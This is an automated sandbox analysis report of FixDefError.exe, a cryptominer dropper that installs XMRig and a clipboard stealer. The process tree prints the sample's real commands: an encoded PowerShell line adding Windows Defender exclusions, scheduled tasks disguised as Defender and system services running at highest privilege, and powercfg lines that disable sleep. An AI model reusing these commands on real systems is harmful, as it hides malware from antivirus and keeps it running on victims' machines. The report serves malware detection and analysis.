Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FixDefError.exe

Overview

General Information

Sample Name:FixDefError.exe
Analysis ID:829697
MD5:1b664f2a0bede6c47e44ca8c0aad3de7
SHA1:2dc3169220411d03be438047a3c33696b4371d2b
SHA256:908641c2c756b0a2762e4883f7defb050e1baa09d44be8cdad34c5aa562d65d9
Tags:exe
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Malicious sample detected (through community Yara rule)
Sigma detected: Schedule system process
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Modifies power options to not sleep / hibernate
Found strings related to Crypto-Mining
Modifies the hosts file
Encrypted powershell cmdline option found
Sample is not signed and drops a device driver
Uses the Telegram API (likely for C&C communication)
Changes security center settings (notifications, updates, antivirus, firewall)
Machine Learning detection for sample
May check the online IP address of the machine
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Machine Learning detection for dropped file
Uses schtasks.exe or at.exe to add and modify task schedules
Uses powercfg.exe to modify the power settings
Queries the volume information (name, serial number etc) of a device
Yara signature match
Drops PE files to the application program directory (C:\ProgramData)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Creates driver files
Binary contains a suspicious time stamp
Creates a window with clipboard capturing capabilities
PE file contains more sections than normal
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • FixDefError.exe (PID: 5872 cmdline: C:\Users\user\Desktop\FixDefError.exe MD5: 1B664F2A0BEDE6C47E44CA8C0AAD3DE7)
    • ProgramStarter.exe (PID: 5928 cmdline: "C:\Users\user\AppData\Local\Temp\ProgramStarter.exe" MD5: 0326F45523014399DEA91452C957B5E0)
      • cmd.exe (PID: 6128 cmdline: cmd.exe" /C powershell -EncodedCommand "PAAjAHMAVQBCAHYAVgBJAEcAcABFAEoAbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAYwBJAFQAWQBjAHAAQgBHAEwAVgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAagB0AEcAZAB6AFEAYwBUAEUATQBPAGwAZQBKAFYAcAB3AGkAbAAjAD4AIABAACgAIAA8ACMARgBvAEwAVABHAFkAcwBGAHEAcwByAGkAWQB5ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBwAEsAUABlAHYARgBGAGwAUgBOAGkAWgBFAFAAWABLAGgATgBJACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBRAFUAQgBKAHkAdgBlAEsARgBUACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEkAcQBjAFcAcQBHAEYAagBSAGMATQBFAGgAWQBzAHUAYgAjAD4A MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 5228 cmdline: powershell -EncodedCommand "PAAjAHMAVQBCAHYAVgBJAEcAcABFAEoAbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAYwBJAFQAWQBjAHAAQgBHAEwAVgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAagB0AEcAZAB6AFEAYwBUAEUATQBPAGwAZQBKAFYAcAB3AGkAbAAjAD4AIABAACgAIAA8ACMARgBvAEwAVABHAFkAcwBGAHEAcwByAGkAWQB5ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBwAEsAUABlAHYARgBGAGwAUgBOAGkAWgBFAFAAWABLAGgATgBJACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBRAFUAQgBKAHkAdgBlAEsARgBUACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEkAcQBjAFcAcQBHAEYAagBSAGMATQBFAGgAWQBzAHUAYgAjAD4A" MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • cmd.exe (PID: 3196 cmdline: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 1672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 4900 cmdline: SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: 15FF7D8324231381BAD48A052F85DF04)
      • cmd.exe (PID: 4092 cmdline: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 2436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 2220 cmdline: SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: 15FF7D8324231381BAD48A052F85DF04)
      • cmd.exe (PID: 4844 cmdline: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 5268 cmdline: SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: 15FF7D8324231381BAD48A052F85DF04)
      • cmd.exe (PID: 4560 cmdline: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 3012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 5296 cmdline: SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: 15FF7D8324231381BAD48A052F85DF04)
      • cmd.exe (PID: 1964 cmdline: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 2956 cmdline: SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: 15FF7D8324231381BAD48A052F85DF04)
      • cmd.exe (PID: 5272 cmdline: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 3228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 2820 cmdline: SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: 15FF7D8324231381BAD48A052F85DF04)
      • cmd.exe (PID: 5396 cmdline: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 5528 cmdline: SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: 15FF7D8324231381BAD48A052F85DF04)
      • cmd.exe (PID: 2156 cmdline: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 4648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 5584 cmdline: SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: 15FF7D8324231381BAD48A052F85DF04)
      • cmd.exe (PID: 5552 cmdline: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk697" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 4952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 5564 cmdline: SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk697" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: 15FF7D8324231381BAD48A052F85DF04)
      • cmd.exe (PID: 5624 cmdline: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk64" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 1392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 5724 cmdline: SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk64" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: 15FF7D8324231381BAD48A052F85DF04)
      • cmd.exe (PID: 5676 cmdline: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk620" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 4996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 5736 cmdline: SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk620" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: 15FF7D8324231381BAD48A052F85DF04)
      • cmd.exe (PID: 5700 cmdline: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 6052 cmdline: SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: 15FF7D8324231381BAD48A052F85DF04)
      • cmd.exe (PID: 5636 cmdline: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 5312 cmdline: SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: 15FF7D8324231381BAD48A052F85DF04)
      • cmd.exe (PID: 5608 cmdline: "cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powercfg.exe (PID: 5292 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: FA313DB034098C26069DBADD6178DEB3)
        • powercfg.exe (PID: 3776 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: FA313DB034098C26069DBADD6178DEB3)
        • powercfg.exe (PID: 4604 cmdline: powercfg /x -standby-timeout-ac 0 MD5: FA313DB034098C26069DBADD6178DEB3)
          • Conhost.exe (PID: 6040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powercfg.exe (PID: 4940 cmdline: powercfg /x -standby-timeout-dc 0 MD5: FA313DB034098C26069DBADD6178DEB3)
        • powercfg.exe (PID: 5652 cmdline: powercfg /hibernate off MD5: FA313DB034098C26069DBADD6178DEB3)
        • schtasks.exe (PID: 4688 cmdline: SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f MD5: 15FF7D8324231381BAD48A052F85DF04)
      • cmd.exe (PID: 6112 cmdline: "cmd.exe" /C SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 2728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 2764 cmdline: SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f MD5: 15FF7D8324231381BAD48A052F85DF04)
      • cmd.exe (PID: 5700 cmdline: "cmd.exe" /c chcp 1251 & C:\ProgramData\RuntimeBrokerData\svhost.exe -c config.json MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • chcp.com (PID: 4092 cmdline: chcp 1251 MD5: 561054CF9C4B2897E80D7E7D9027FED9)
  • svchost.exe (PID: 4932 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5684 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 160 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • RegSvc.exe (PID: 5524 cmdline: C:\ProgramData\RuntimeBrokerData\RegSvc.exe MD5: BFD02E7E401667B6C5853FE0FBEC26E7)
  • svchost.exe (PID: 3920 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5284 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 1276 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 1112 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5724 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    sslproxydump.pcapLinux_Trojan_Pornoasset_927f314funknownunknown
    • 0x18b2d8:$a: C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48
    sslproxydump.pcapMacOS_Cryptominer_Xmrig_241780a1unknownunknown
    • 0x6aab33:$a1: mining.set_target
    • 0x69baba:$a2: XMRIG_HOSTNAME
    • 0x69e99e:$a3: Usage: xmrig [OPTIONS]
    • 0x69ba94:$a4: XMRIG_VERSION

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\RuntimeBrokerData\svhost.exeXMRIG_Monero_MinerDetects Monero mining softwareFlorian Roth (Nextron Systems)
    • 0x66b5e8:$s1: 'h' hashrate, 'p' pause, 'r' resume
    • 0x61023e:$s2: --cpu-affinity
    • 0x610258:$s3: set process affinity to CPU core(s), mask 0x3 for cores 0 and 1
    • 0x60fb88:$s4: password for mining server
    C:\ProgramData\RuntimeBrokerData\svhost.exeMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth (Nextron Systems)
    • 0x66b108:$x1: donate.ssl.xmrig.com
    • 0x66b5d9:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
    • 0x6fc723:$s2: \\?\pipe\uv\%p-%lu
    C:\ProgramData\RuntimeBrokerData\svhost.exeJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      C:\ProgramData\RuntimeBrokerData\svhost.exeMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
      • 0x66c788:$s1: %s/%s (Windows NT %lu.%lu
      • 0x670e08:$s3: \\.\WinRing0_
      • 0x611b42:$s4: pool_wallet
      • 0x60c170:$s5: cryptonight
      • 0x60c17e:$s5: cryptonight
      • 0x60c18d:$s5: cryptonight
      • 0x60c19b:$s5: cryptonight
      • 0x60c1b0:$s5: cryptonight
      • 0x60c1bf:$s5: cryptonight
      • 0x60c1cd:$s5: cryptonight
      • 0x60c1e2:$s5: cryptonight
      • 0x60c1f1:$s5: cryptonight
      • 0x60c202:$s5: cryptonight
      • 0x60c219:$s5: cryptonight
      • 0x60c227:$s5: cryptonight
      • 0x60c235:$s5: cryptonight
      • 0x60c245:$s5: cryptonight
      • 0x60c257:$s5: cryptonight
      • 0x60c268:$s5: cryptonight
      • 0x60c278:$s5: cryptonight
      • 0x60c288:$s5: cryptonight
      C:\ProgramData\RuntimeBrokerData\svhost.exeLinux_Trojan_Pornoasset_927f314funknownunknown
      • 0x140958:$a: C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48
      Click to see the 1 entries

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000001.00000003.291048663.0000000006B81000.00000004.00000800.00020000.00000000.sdmpLinux_Trojan_Pornoasset_927f314funknownunknown
      • 0x50990:$a: C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48

      Sigma Signatures

      Persistence and Installation Behavior

      barindex
      Sigma detected: Schedule system process
      Source: Process startedAuthor: Joe Security: Data: Command: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f, CommandLine: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\ProgramStarter.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe, ParentProcessId: 5928, ParentProcessName: ProgramStarter.exe, ProcessCommandLine: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f, ProcessId: 3196, ProcessName: cmd.exe

      Snort Signatures

      Timestamp:192.168.2.38.8.8.849977532036289 03/19/23-00:18:14.932574
      SID:2036289
      Source Port:49977
      Destination Port:53
      Protocol:UDP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.395.179.241.203496974432831812 03/19/23-00:18:15.028582
      SID:2831812
      Source Port:49697
      Destination Port:443
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.395.179.241.203496964432831812 03/19/23-00:18:02.289189
      SID:2831812
      Source Port:49696
      Destination Port:443
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.38.8.8.862704532036289 03/19/23-00:18:02.189431
      SID:2036289
      Source Port:62704
      Destination Port:53
      Protocol:UDP
      Classtype:A Network Trojan was detected

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: FixDefError.exeReversingLabs: Detection: 25%
      Source: FixDefError.exeVirustotal: Detection: 39%Perma Link
      Antivirus detection for dropped file
      Source: C:\ProgramData\RuntimeBrokerData\svhost.exeAvira: detection malicious, Label: HEUR/AGEN.1203240
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeAvira: detection malicious, Label: HEUR/AGEN.1236409
      Multi AV Scanner detection for dropped file
      Source: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exeReversingLabs: Detection: 79%
      Source: C:\ProgramData\RuntimeBrokerData\svhost.exeReversingLabs: Detection: 80%
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeReversingLabs: Detection: 30%
      Machine Learning detection for sample
      Source: FixDefError.exeJoe Sandbox ML: detected
      Machine Learning detection for dropped file
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeJoe Sandbox ML: detected
      Source: C:\ProgramData\RuntimeBrokerData\svhost.exeJoe Sandbox ML: detected
      Source: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeJoe Sandbox ML: detected

      Bitcoin Miner

      barindex
      Yara detected Xmrig cryptocurrency miner
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Source: Yara matchFile source: C:\ProgramData\RuntimeBrokerData\svhost.exe, type: DROPPED
      Found strings related to Crypto-Mining
      Source: svhost.exe.1.drString found in binary or memory: stratum+ssl://randomx.xmrig.com:443
      Source: svhost.exe.1.drString found in binary or memory: cryptonight/0
      Source: svhost.exe.1.drString found in binary or memory: -o, --url=URL URL of mining server
      Source: svhost.exe.1.drString found in binary or memory: stratum+tcp://
      Source: svhost.exe.1.drString found in binary or memory: Usage: xmrig [OPTIONS]
      Source: svhost.exe.1.drString found in binary or memory: XMRig 6.17.0
      Source: unknownHTTPS traffic detected: 198.251.88.130:443 -> 192.168.2.3:49685 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.237.62.211:443 -> 192.168.2.3:49686 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49687 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.3:49688 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.3:49689 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.3:49690 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 198.251.88.130:443 -> 192.168.2.3:49692 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 198.251.88.130:443 -> 192.168.2.3:49695 version: TLS 1.2
      Source: FixDefError.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: ImpulseWatch.pdb source: ProgramStarter.exe, 00000001.00000002.328304357.0000000004933000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe.1.dr
      Source: Binary string: ImpulseWatch.pdb|l source: ProgramStarter.exe, 00000001.00000002.328304357.0000000004933000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe.1.dr
      Source: Binary string: ProgramInstaller.pdb source: FixDefError.exe
      Source: Binary string: Impulse.pdb source: FixDefError.exe, 00000000.00000002.302610547.0000000005B07000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000000.249150208.0000000000752000.00000002.00000001.01000000.00000007.sdmp, ProgramStarter.exe.0.dr
      Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.1.dr
      Source: Binary string: ImpulseClipper.pdb source: ProgramStarter.exe, 00000001.00000002.328304357.0000000004AB9000.00000004.00000800.00020000.00000000.sdmp, RegSvc.exe, 00000038.00000000.287793640.00000000001B2000.00000002.00000001.01000000.00000009.sdmp, RegSvc.exe.1.dr

      Networking

      barindex
      Snort IDS alert for network traffic
      Source: TrafficSnort IDS: 2831812 ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-16 8) 192.168.2.3:49696 -> 95.179.241.203:443
      Source: TrafficSnort IDS: 2831812 ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-16 8) 192.168.2.3:49697 -> 95.179.241.203:443
      Source: TrafficSnort IDS: 2036289 ET TROJAN CoinMiner Domain in DNS Lookup (pool .hashvault .pro) 192.168.2.3:62704 -> 8.8.8.8:53
      Source: TrafficSnort IDS: 2036289 ET TROJAN CoinMiner Domain in DNS Lookup (pool .hashvault .pro) 192.168.2.3:49977 -> 8.8.8.8:53
      Uses the Telegram API (likely for C&C communication)
      Source: unknownDNS query: name: api.telegram.org
      May check the online IP address of the machine
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeDNS query: name: api.ipify.org
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeDNS query: name: api.ipify.org
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeDNS query: name: api.ipify.org
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeDNS query: name: api.ipify.org
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeDNS query: name: api.ipify.org
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeDNS query: name: api.ipify.org
